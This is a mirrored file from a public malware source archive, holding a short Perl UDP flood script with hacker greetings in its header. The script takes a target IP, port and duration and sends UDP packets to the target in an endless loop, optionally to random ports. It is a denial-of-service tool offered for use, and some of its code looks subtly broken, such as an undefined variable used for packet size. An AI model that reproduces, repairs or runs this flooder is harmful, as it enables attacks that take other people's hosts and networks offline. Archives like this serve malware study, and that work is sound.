mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-21 02:46:10 +00:00
58 lines
1.1 KiB
Plaintext
58 lines
1.1 KiB
Plaintext
|
#####################################################
|
||
|
# udp flood.
|
||
|
#
|
||
|
# gr33ts: meth, etech, skrilla, datawar, fr3aky, etc.
|
||
|
#
|
||
|
# --/odix
|
||
|
######################################################
|
||
|
|
||
|
use Socket;
|
||
|
|
||
|
$ARGC=@ARGV;
|
||
|
|
||
|
if ($ARGC !=3) {
|
||
|
printf "$0 <ip> <port> <time>\n";
|
||
|
printf "if arg1/2 =0, randports/continous packets.\n";
|
||
|
exit(1);
|
||
|
}
|
||
|
|
||
|
my ($ip,$port,$size,$time);
|
||
|
$ip=$ARGV[0];
|
||
|
$port=$ARGV[1];
|
||
|
$time=$ARGV[2];
|
||
|
|
||
|
socket(crazy, PF_INET, SOCK_DGRAM, 17);
|
||
|
$iaddr = inet_aton("$ip");
|
||
|
|
||
|
printf "udp flood - KaN3\n";
|
||
|
|
||
|
if ($ARGV[1] ==0 && $ARGV[2] ==0) {
|
||
|
goto randpackets;
|
||
|
}
|
||
|
if ($ARGV[1] !=0 && $ARGV[2] !=0) {
|
||
|
system("(sleep $time;killall -9 udp) &");
|
||
|
goto packets;
|
||
|
}
|
||
|
if ($ARGV[1] !=0 && $ARGV[2] ==0) {
|
||
|
goto packets;
|
||
|
}
|
||
|
if ($ARGV[1] ==0 && $ARGV[2] !=0) {
|
||
|
system("(sleep $time;killall -9 udp) &");
|
||
|
goto randpackets;
|
||
|
}
|
||
|
|
||
|
packets:
|
||
|
for (;;) {
|
||
|
$size=$rand x $rand x $rand;
|
||
|
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
|
||
|
}
|
||
|
|
||
|
randpackets:
|
||
|
for (;;) {
|
||
|
$size=$rand x $rand x $rand;
|
||
|
$port=int(rand 65000) +1;
|
||
|
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
|
||
|
}
|
||
|
|
||
|
|